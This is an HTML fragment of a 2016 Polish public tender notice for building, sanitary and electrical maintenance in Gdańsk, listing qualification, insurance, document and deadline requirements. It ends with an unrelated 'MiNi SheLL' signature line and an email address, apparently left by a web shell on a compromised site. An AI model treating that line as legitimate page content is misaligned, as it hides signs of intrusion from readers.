<br>b)	1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w 	budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w 	zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i 	kanalizacyjnych,
<br>c)	1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w 	budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w 	zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
<br>d)	1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku dozoru w zakresie 	konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji i sieci należących do Grupy 3. Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i 	zużywające paliwa gazowe dla urządzeń i instalacji gazowych o ciśnieniu nie wyższym niż 5 kPa 	zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby 	zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.),
<br>e)	1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie 	konserwacji, remontów, urządzeń, instalacji i sieci należących do Grupy 3. Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwa gazowe dla urządzeń i instalacji gazowych o ciśnieniu nie wyższym niż 5 kPa zgodnie z 	przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się 	eksploatacją urządzeń, 	instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.),
<br>f)	1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie 	konserwacji, remontów, urządzeń, należących do Grupy 2. Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne dla 	następujących urządzeń i instalacji: instalacje cieplne o przesyle ciepła powyżej  50 kW zgodnie z 	przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w 	sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się 	eksploatacją urządzeń, 	instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.),
<br>g)	1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie 	montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1. Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające,  przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się 	eksploatacją urządzeń, 	instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.),
<br>Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji 	do 1 	kV.
<br>h)   4 osobami do wykonywania zleconych robót. 
	
<br>Wykonawca musi wykazać, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się uprawnieniami budowlanymi wydanymi na podstawie ustawy z dnia 07.07.1994 r. - Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zmianami).
<br>Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 07. 07.1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63,poz. 394).

<br>Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.

<br>Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 350 000,00 zł.

<br>W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.

<br>Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty budowlane Zamawiający rozumie:
<br>- roboty polegające na wykonaniu robót ogólnobudowlanych w budynkach o wartości co najmniej 15 000,00 zł brutto , 
<br>- roboty polegające na wykonywaniu robót remontowych wewnętrznych instalacji 	sanitarnych w budynkach o wartości co najmniej 6 000,00 zł brutto, 
<br>- roboty polegające na wykonaniu robót remontowych wewnętrznych instalacji elektrycznych w budynkach o wartości co najmniej 3 000,00 zł brutto.
<br>Zamawiający nie żąda informacji o robotach niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi Zamawiający rozumie:
<br>- usługi polegające na wykonywaniu usług ogólnobudowlanych konserwacyjnych w budynkach o wartości co najmniej 15 000,00 zł brutto, 
<br>- usługi polegające na wykonywaniu usług konserwacyjnych wewnętrznych instalacji sanitarnych w budynkach o wartości co najmniej  6 000,00 zł brutto, 
<br>- usługi polegające na wykonywaniu usług konserwacyjnych wewnętrznych instalacji	elektrycznych w budynkach o wartości co najmniej 3 000,00 zł brutto, 
<br>Zamawiający nie żąda informacji o usługach niewykonanych lub wykonanych nienależycie;;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>a)	pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, 
<br> Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk  OFERTA, który należy sporządzić wg wzoru druku załączonego przez zamawiającego.
<br>b)	Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy 	lub  nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania 	spełnienia 	warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że 	całość zamówienia będzie wykonywana przez Wykonawcę osobiście.
<br>c)	Udzielić rękojmi za wady na okres minimum 12 miesięcy,
<br>d)	Podać w złożonej ofercie  czas reakcji Wykonawcy od zgłoszenia do przyjazdu na miejsce awarii.
<br>Maksymalny czas reakcji winien wynosić 120 minut. Określenie czasu powyżej 120 minut spowoduje odrzucenie oferty.
<br>e)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 13 SIWZ.
<br>f)	Wykazać, że oferta została podpisana przez osobę/y uprawnioną/e do występowania w imieniu i na rzecz 	wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - Czas reakcji Wykonawcy od zgłoszenia do przyjazdu na miejsce awarii - 0.15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:
<br>1.	Następujące postanowienia umowy mogą ulec zmianie:
<br>a)	Wykaz obiektów, gdzie wykonywane będą roboty konserwacyjne, określony w załączniku nr 1 do siwz -wykaz adresowy budynków BOM 9.
<br>b)	Zmianie może ulec osoba kierownika budowy lub kierowników robót, jako przedstawicieli Wykonawcy pod 	warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie.
<br>c)	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach 	określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania 	warunków 	udziału w postępowaniu.
<br>d)	Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert.
<br>2.	Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:
<br>a)	Wykaz obiektów może ulec zmianie w przypadku:
<br>-  przekazania obiektów w zarząd innemu zarządcy,
<br>-  przejęcia w zarząd nowych obiektów.
<br>b)	Zmiana osoby kierownika budowy lub kierowników robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z kierownikiem budowy lub kierownikami robót. Zamawiający zaakceptuje zmianę tych osób, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.
<br>c)	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania 	warunków udziału  w  postępowaniu  jest  możliwa  w  przypadku  wykazania  przez  wykonawcę, iż 	proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie  zamówienia.
<br>d)	Zawarcie umów o podwykonawstwo na etapie realizacji umowy w przypadku braku zadeklarowania 	realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, jeżeli w 	stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. 
<br>Cena brutto - 12,30 PLN.
<br>Warunki i sposób płatności: zaliczenie pocztowe, przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2016 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.03.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 17.02.2016 r. godzina  10:30, 
<br>miejsce w siedzibie zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1, w  pokoju nr 6 - świetlica

<br>OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI 
<br>Grażyna Berowska stanowisko służbowe starszy specjalista ds. zamówień publicznych, 
<br>80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 10 32
<br>Adres poczty elektronicznej: berowska@gznk.pl

<br>ZASADY WYKLUCZENIA WYKONAWCY
<br>Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.
<br>Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com